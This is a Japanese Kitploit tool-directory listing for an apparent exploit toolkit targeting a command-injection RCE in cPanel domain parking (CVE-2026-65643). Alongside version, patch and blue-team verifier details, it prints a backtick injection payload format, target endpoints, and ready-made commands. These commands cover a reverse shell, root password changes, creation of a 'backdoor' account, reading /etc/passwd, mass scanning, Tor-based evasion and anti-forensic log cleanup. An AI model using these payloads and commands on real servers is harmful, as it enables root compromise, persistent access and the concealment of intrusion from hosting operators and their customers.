Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-65643-PoC-Toolkit — Red/Blueチーム向けツールキット。CVE-2026-65643(cPanelのドメインパーキングにおけるRCE)に対応。リバースシェル、ウェブシェル、永続化、マススキャンを備えたエクスプロイトに加え、検知および監査用の非侵襲型検証ツールを含む。 | Kitploit
ツール/GitHubGitHub/tc4dy/cve-2026-65643-poc-toolkit
特権昇格脆弱性スキャナー永続化メカニズムエクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテストコマンド&コントロールレッドチーミング

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ペイロード開発
GitHubtc4dy/cve-2026-65643-poc-toolkit

CVE-2026-65643-PoC-Toolkit

Red/Blueチーム向けツールキット。CVE-2026-65643(cPanelのドメインパーキングにおけるRCE)に対応。リバースシェル、ウェブシェル、永続化、マススキャンを備えたエクスプロイトに加え、検知および監査用の非侵襲型検証ツールを含む。

リポジトリを見る
1日前未レビュー

CVEPoC

CVE‑2026‑65643 – cPanel ドメインパーキング RCE ツールキット

Python 3.8+ CVSS Author cPanel

⚠️ 倫理的な使用のみ – 許可されたセキュリティテスト このリポジトリは、許可されたセキュリティ専門家、ブルーチーム、ペネトレーションテスターのみを対象としたツールを提供します。 コンピュータシステムへの不正アクセスは、米国CFAA、英国Computer Misuse Act、トルコTCK 243/244、および世界各国の同様の法律で違法とされています。


📖 脆弱性の概要

CVE‑2026‑65643 は、cPanel & WHM 11.x における重大なコマンドインジェクション脆弱性であり、認証済みのcPanelユーザーがドメインパーキング機能を介してroot権限で任意のシステムコマンドを実行できるようにします。

動作の仕組み

  1. 認証済みアクセスが必要 – 攻撃者は対象サーバー上に有効なcPanelアカウント(ユーザー名/パスワード)を持っている必要があります。
  2. ドメインパーキングインジェクション – パーク済みドメインを追加する際、ドメイン名が適切にサニタイズされず、攻撃者がバッククォート(`)を使用してシェルコマンドを注入できるようになります。
  3. コマンド実行 – 注入されたコマンドは、cPanelユーザーの権限でシステムによって実行され、権限昇格技術を介してrootに昇格される可能性があります。
  4. root権限 – ドメインパーキング操作は十分な権限で実行されるため、任意のコマンドを高い権限で実行できます。
  5. 影響 – サーバー全体の侵害、データ窃取、バックドア、ランサムウェア、横展開。直ちにアップグレードしてください!

影響を受けるバージョン

  • cPanel & WHM 11.110.0.140 以前 – 脆弱
  • 11.134.0.52 以前 – 脆弱
  • 11.136.0.36 以前 – 脆弱
  • 11.138.0.1 以前 – 脆弱
  • 11.138.1.6 以降 – パッチ適用済み

パッチ

  • cPanel & WHM 11.138.1.6、11.138.0.2、11.136.0.37、11.134.0.53、または 11.110.0.141 以降にアップグレードしてください。
  • アップグレードが不可能な場合は、一時的な回避策としてcPanelユーザーのドメインパーキング権限を無効化してください。

🧰 ツール

ツール目的対象ユーザー
exploit.pyリバースシェル、ウェブシェル、永続化、ファイル読み書き、rootパスワード変更、マススキャン、Torサポート、OPSEC機能を備えた完全な武器化ツールキット。レッドチーム / 許可されたペンテスター
verifier.py悪意のあるペイロードを実行せずにcPanelバージョンを検出し、インジェクションを検証し、リスクを評価する非侵襲的な脆弱性チェッカー。詳細なレポートを生成します。ブルーチーム / セキュリティ監査人

📊 機能比較


🎯 ユースケース概要


⚙️ インストール

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3

📋 パラメータ

exploit.py パラメータ

verifier.py パラメータ


💥 シナリオ


🧪 エンドポイントとインジェクション方式

このエクスプロイトは以下のcPanelエンドポイントとインジェクション方式を使用します:

ペイロード形式

root@kitploit:~
# インジェクションペイロード形式
test.com`<command>`

# 例
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`

🛡️ 責任ある使用

  • 所有しているシステム、または明示的な書面によるテスト許可を得たシステムでのみこれらのツールを使用してください。
  • 不正アクセスは違法かつ非倫理的です。
  • 著者は誤用について一切の責任を負いません。
  • 常に自国の法律と規制に従ってください。

このソフトウェアは教育目的および許可されたセキュリティテストのみを目的として提供されています。

ツールをダウンロード
機能exploit.pyverifier.py
脆弱性検出✅✅
バージョン検出(4エンドポイント)✅✅
コマンドインジェクション✅❌
リバースシェル✅❌
WebShellアップロード✅❌
永続化(cPanelユーザー作成)✅❌
rootパスワード変更✅❌
ファイル読み書き✅❌
4つのインジェクション方式(JSON/Form/CGI/API2)✅✅
Torサポート(匿名性)✅❌
User‑Agentローテーション(OPSEC)✅❌
ジッター(OPSEC)✅❌
マススキャン(マルチスレッド)✅❌
対話型シェル✅❌
非侵襲的(安全)モード❌✅
タイムラインログ✅✅
HTMLレポート✅❌
JSONレポート✅✅
ログクリーンアップ(アンチフォレンジック)✅✅
プロキシサポート✅✅
カスタムUser‑Agent✅✅
SSL検証制御✅✅
シナリオ推奨ツール
ブルーチーム – cPanelインストールが脆弱かどうかの確認verifier.py
セキュリティ監査 – 非侵襲的な脆弱性評価verifier.py
レッドチーム – 完全なエクスプロイトを伴う許可されたペネトレーションテストexploit.py
バグバウンティ – 責任ある開示テストverifier.py
マススキャン – 複数のターゲットの脆弱性確認exploit.py(検出のみ)
インシデントレスポンス – システムが侵害されているかの確認verifier.py
パラメータ説明
-t, --target対象cPanel URL(例:https://cpanel.example.com:2083)
-l, --target-fileマススキャン用のターゲットリストを含むファイル(1行に1つ)
-u, --usernamecPanelユーザー名
-P, --passwordcPanelパスワード
-p, --portcPanelポートの上書き(デフォルトはURLまたは2083)
--threadsマルチターゲット用スレッド数(デフォルト:10)
-o, --outputJSONレポートをファイルに保存
--html-reportHTMLレポートをファイルに保存
-v, --verbose詳細出力
--proxyHTTP/HTTPSプロキシ(例:http://127.0.0.1:8080)
--torTor経由でルーティング(localhost:9050)
-ua, --user-agentカスタムUser‑Agent
--no-keep-aliveセッションを維持しない
--delayリクエスト間の遅延(デフォルト:2.0秒)
--jitterリクエスト間のランダムジッター(0〜1秒)(デフォルト:0.5)
--max-retries最大リトライ回数(デフォルト:5)
--ssl-verifySSL証明書の検証
--timeoutリクエストタイムアウト(デフォルト:15秒)
--cmdターゲット上で単一のコマンドを実行
--reverse-shellリバースシェル IP:PORT
--passwdrootパスワードの変更
--addusercPanelユーザーの作成(USER DOMAIN PASSWORD)
--readファイルの読み取り
--writeファイルの書き込み(パスを指定)
--write-content書き込むコンテンツ
--cleanupエクスプロイト後のログと履歴のクリーンアップ
-i, --interactiveエクスプロイト後の対話型シェル
--domain-suffixパーク済みドメインのサフィックス(デフォルト:exploit.local)
パラメータ説明
-t, --target対象cPanel URL(例:https://cpanel.example.com:2083)
-u, --usernamecPanelユーザー名
-P, --passwordcPanelパスワード
-o, --outputJSONレポートをファイルに保存
-v, --verbose詳細出力
--proxyHTTP/HTTPSプロキシ(例:http://127.0.0.1:8080)
--torTor経由でルーティング(localhost:9050)
--ssl-verifySSL証明書の検証
--timeoutリクエストタイムアウト(デフォルト:15秒)
--cleanupテスト後のログのクリーンアップ
#シナリオコマンド
1クイック脆弱性チェックpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass
2レポート付き詳細スキャンpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v
3リバースシェルpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4コマンド実行python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami"
5機密ファイルの読み取りpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6rootパスワードの変更python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7新しいcPanelユーザーの作成(永続化)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8エクスプロイト後の対話型シェルpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9ファイルからのマススキャンpython exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json
10プロキシ、Tor、カスタムUser‑Agentの使用python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0"
11エクスプロイト後のログクリーンアップpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup
方式エンドポイント説明
JSON API/cpsessXXXXX/json-api/domainJSONペイロードによる主要なインジェクション方式
フォームデータ/cpsessXXXXX/json-api/domainフォームエンコードデータによる代替インジェクション
CGIスクリプト/cgi-sys/domainpark.cgiレガシーCGIエンドポイントインジェクション
API2/cpsessXXXXX/json-api/cpanelレガシーAPI2インジェクション方式